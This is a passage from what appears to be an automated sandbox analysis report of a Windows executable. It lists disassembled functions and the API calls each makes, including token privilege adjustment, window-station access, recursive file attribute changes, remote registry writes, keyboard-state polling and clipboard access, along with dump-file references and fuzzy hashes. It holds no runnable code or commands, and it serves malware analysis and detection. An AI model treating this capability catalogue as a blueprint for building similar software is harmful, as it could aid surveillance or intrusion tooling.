                                                                                                                                                    • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                                                                                                                    • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                                                                                                                                                  • _memset.LIBCMT ref: 00458353
                                                                                                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004583A5
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004583B6
                                                                                                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004583CD
                                                                                                                                                  • GetProcessWindowStation.USER32 ref: 004583E6
                                                                                                                                                  • SetProcessWindowStation.USER32(00000000), ref: 004583F0
                                                                                                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0045840A
                                                                                                                                                    • Part of subcall function 004581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                                                                                                                                                    • Part of subcall function 004581CB: CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                                  • String ID: $default$winsta0
                                                                                                                                                  • API String ID: 2063423040-1027155976
                                                                                                                                                  • Opcode ID: 0ddeae3dc57cf593c62668a5198c180965c612a3f0a563ffd60b2d372adb3bab
                                                                                                                                                  • Instruction ID: 3323b63beeccf06d974511bf231c05544c13643482a2b8641c754c26865e528a
                                                                                                                                                  • Opcode Fuzzy Hash: 0ddeae3dc57cf593c62668a5198c180965c612a3f0a563ffd60b2d372adb3bab
                                                                                                                                                  • Instruction Fuzzy Hash: F3814871900209BFDF119FA5DC45AEE7B78AF08305F14416EFC10B6262EF399A19DB28
                                                                                                                                                  Function 0046C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0046C78D
                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0046C7E1
                                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C806
                                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C81D
                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0046C844
                                                                                                                                                  • __swprintf.LIBCMT ref: 0046C890
                                                                                                                                                  • __swprintf.LIBCMT ref: 0046C8D3
                                                                                                                                                    • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                  • __swprintf.LIBCMT ref: 0046C927
                                                                                                                                                    • Part of subcall function 00423698: __woutput_l.LIBCMT ref: 004236F1
                                                                                                                                                  • __swprintf.LIBCMT ref: 0046C975
                                                                                                                                                    • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 00423713
                                                                                                                                                    • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 0042372B
                                                                                                                                                  • __swprintf.LIBCMT ref: 0046C9C4
                                                                                                                                                  • __swprintf.LIBCMT ref: 0046CA13
                                                                                                                                                  • __swprintf.LIBCMT ref: 0046CA62
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                                  • API String ID: 3953360268-2428617273
                                                                                                                                                  • Opcode ID: 77525ac0cfac28e2ae67cd84ccd41d374f9895f2458c58216a587ca322c69e5f
                                                                                                                                                  • Instruction ID: 7d9c3182f1c50569ad22dcb29b7867164fdd6ce968260aea251e7ba13e5350ae
                                                                                                                                                  • Opcode Fuzzy Hash: 77525ac0cfac28e2ae67cd84ccd41d374f9895f2458c58216a587ca322c69e5f
                                                                                                                                                  • Instruction Fuzzy Hash: AFA13EB1504304ABC710EFA5C885DAFB7ECFF94708F40492EF585D6192EA38DA08CB66
                                                                                                                                                  Function 0046EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0046EFB6
                                                                                                                                                  • _wcscmp.LIBCMT ref: 0046EFCB
                                                                                                                                                  • _wcscmp.LIBCMT ref: 0046EFE2
                                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 0046EFF4
                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 0046F00E
                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0046F026
                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0046F031
                                                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F04D
                                                                                                                                                  • _wcscmp.LIBCMT ref: 0046F074
                                                                                                                                                  • _wcscmp.LIBCMT ref: 0046F08B
                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F09D
                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F0BB
                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F0C5
                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0046F0D2
                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0046F0E4
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                  • String ID: *.*
                                                                                                                                                  • API String ID: 1803514871-438819550
                                                                                                                                                  • Opcode ID: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                                                                                                                                                  • Instruction ID: e0d4b25dfa95f140917fd6c0b332215adfde449a0ea65fd213ed944f24ec6cf3
                                                                                                                                                  • Opcode Fuzzy Hash: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                                                                                                                                                  • Instruction Fuzzy Hash: EC31E7325011187ADF14EFA4EC48AEF77AC9F44360F10057BE844D2191EB79DA88CB6E
                                                                                                                                                  Function 00480857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00480953
                                                                                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,0048F910,00000000,?,00000000,?,?), ref: 004809C1
                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00480A09
                                                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00480A92
                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00480DB2
                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00480DBF
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                  • API String ID: 536824911-966354055
                                                                                                                                                  • Opcode ID: ca1d39e7c3dcd50cd69e0756345bcbe67b5e5b1012420fcf5cc1910ba9abc4c2
                                                                                                                                                  • Instruction ID: 75f0257f13d9dd97868b06569ad7b6a65722ecc89240c550ead6eefe92fcdcfb
                                                                                                                                                  • Opcode Fuzzy Hash: ca1d39e7c3dcd50cd69e0756345bcbe67b5e5b1012420fcf5cc1910ba9abc4c2
                                                                                                                                                  • Instruction Fuzzy Hash: 3E023A756106119FCB54EF15D841E2AB7E5FF89314F04886EF8899B3A2CB38EC45CB89
                                                                                                                                                  Function 004166E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 0DJ$0EJ$0FJ$3cA$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGJ$_A
                                                                                                                                                  • API String ID: 0-559809668
                                                                                                                                                  • Opcode ID: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                                                                                                                                                  • Instruction ID: 6096d484c95c14ad7aa8192e29e4e3e8d71b99b3f093478e4f466f6acf52d5c9
                                                                                                                                                  • Opcode Fuzzy Hash: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                                                                                                                                                  • Instruction Fuzzy Hash: 13727E75E002199BDB14CF59C8807EEB7B5FF48311F15816BE809EB291E7389E85CB98
                                                                                                                                                  Function 0046F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0046F113
                                                                                                                                                  • _wcscmp.LIBCMT ref: 0046F128
                                                                                                                                                  • _wcscmp.LIBCMT ref: 0046F13F
                                                                                                                                                    • Part of subcall function 00464385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004643A0
                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0046F16E
                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0046F179
                                                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F195
                                                                                                                                                  • _wcscmp.LIBCMT ref: 0046F1BC
                                                                                                                                                  • _wcscmp.LIBCMT ref: 0046F1D3
                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F1E5
                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F203
                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F20D
                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0046F21A
                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0046F22C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                  • String ID: *.*
                                                                                                                                                  • API String ID: 1824444939-438819550
                                                                                                                                                  • Opcode ID: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                                                                                                                                                  • Instruction ID: 359f8111c83e04d014ff149dee767818393646aa3285bf91305061d844a33625
                                                                                                                                                  • Opcode Fuzzy Hash: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                                                                                                                                                  • Instruction Fuzzy Hash: 1031C3365001196ADF10AEA4FC54AEE77AC9F45360F2005BBE844A2190EA39DE89CA6D
                                                                                                                                                  Function 0046A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0046A20F
                                                                                                                                                  • __swprintf.LIBCMT ref: 0046A231
                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0046A26E
                                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0046A293
                                                                                                                                                  • _memset.LIBCMT ref: 0046A2B2
                                                                                                                                                  • _wcsncpy.LIBCMT ref: 0046A2EE
                                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0046A323
                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0046A32E
                                                                                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 0046A337
                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0046A341
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                                  • String ID: :$\$\??\%s
                                                                                                                                                  • API String ID: 2733774712-3457252023
                                                                                                                                                  • Opcode ID: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                                                                                                                                                  • Instruction ID: f10b276181cf8096dd79107661fba1eb4aa855f6953dd7c4d63ebe7d830bec3b
                                                                                                                                                  • Opcode Fuzzy Hash: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                                                                                                                                                  • Instruction Fuzzy Hash: 1E31C571500119ABDB20DFA0DC49FEF77BCEF88704F1044BAF908E2260E77496948B29
                                                                                                                                                  Function 0046001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00460097
                                                                                                                                                  • SetKeyboardState.USER32(?), ref: 00460102
                                                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00460122
                                                                                                                                                  • GetKeyState.USER32(000000A0), ref: 00460139
                                                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00460168
                                                                                                                                                  • GetKeyState.USER32(000000A1), ref: 00460179
                                                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 004601A5
                                                                                                                                                  • GetKeyState.USER32(00000011), ref: 004601B3
                                                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 004601DC
                                                                                                                                                  • GetKeyState.USER32(00000012), ref: 004601EA
                                                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00460213
                                                                                                                                                  • GetKeyState.USER32(0000005B), ref: 00460221
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 541375521-0
                                                                                                                                                  • Opcode ID: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                                                                                                                                                  • Instruction ID: c6705f0abb03acfe1c66d12a8beead0d319d3067caf51b1e954f1b2a293a3a50
                                                                                                                                                  • Opcode Fuzzy Hash: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                                                                                                                                                  • Instruction Fuzzy Hash: 7F51BC2090478829FB35D7A098547EBBFB49F12380F08459F99C2566C3FA5C9A8CC75B
                                                                                                                                                  Function 004803DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004804AC
                                                                                                                                                    • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                    • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0048054B
                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004805E3
                                                                                                                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00480822
                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0048082F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1240663315-0
                                                                                                                                                  • Opcode ID: eef4f06837c88c6333fe19f002081eafe954a4facf3daecfb412de137efda7e6
                                                                                                                                                  • Instruction ID: efbac3d2c4afa975f371ae5d5fee671ec22ce1fa5a9a6cb729be810612663562
                                                                                                                                                  • Opcode Fuzzy Hash: eef4f06837c88c6333fe19f002081eafe954a4facf3daecfb412de137efda7e6
                                                                                                                                                  • Instruction Fuzzy Hash: A5E16E71614200AFCB54EF25C891D2FBBE4EF89314B04896EF84ADB3A2D634ED45CB56
                                                                                                                                                  Function 00474164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1737998785-0
                                                                                                                                                  • Opcode ID: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
                                                                                                                                                  • Instruction ID: 6a8dd1f95291b63ae5b16d2a5a0d869dcb5166510358231783c1e180ef80644f
                                                                                                                                                  • Opcode Fuzzy Hash: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
                                                                                                                                                  • Instruction Fuzzy Hash: CE2191352002109FDB00AF54EC09B6E7BA8EF44751F10847AF945E72A2EB38AC05CB5D
                                                                                                                                                  Function 0046F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0046F440
                                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 0046F470
                                                                                                                                                  • _wcscmp.LIBCMT ref: 0046F484
                                                                                                                                                  • _wcscmp.LIBCMT ref: 0046F49F
                                                                                                                                                  • FindNextFileW.KERNEL32(?,?), ref: 0046F53D
